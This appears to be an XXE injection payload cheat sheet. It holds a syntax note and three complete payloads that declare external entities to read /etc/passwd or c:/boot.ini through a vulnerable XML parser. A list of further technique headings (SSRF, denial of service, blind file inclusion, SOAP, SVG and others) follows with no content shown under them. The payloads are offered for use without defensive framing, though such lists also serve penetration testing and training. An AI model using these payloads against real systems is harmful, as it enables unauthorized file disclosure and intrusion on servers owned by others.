
XML External Entity (XXE) Injection Payloads

  • XXE: Classic XXE

The element declaration must use the keyword ANY; the form (#ANY) that appears in some copies of this payload is a DTD syntax error and the parser rejects the document before the entity is ever resolved.

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>

  • XXE: Basic XML Example

  • XXE: Entity Example

  • XXE: File Disclosure

  • XXE: Denial-of-Service Example

  • XXE: Local File Inclusion Example

  • XXE: Blind Local File Inclusion Example (when the first case returns nothing)

  • XXE: Access Control Bypass (Loading Restricted Resources - PHP example)

  • XXE: SSRF (Server-Side Request Forgery) Example

  • XXE: Remote Attack (Through External XML Inclusion) Example

  • XXE: UTF-7 Example

  • XXE: Base64 Encoded

  • XXE: XXE inside SOAP Example

  • XXE: XXE inside SVG
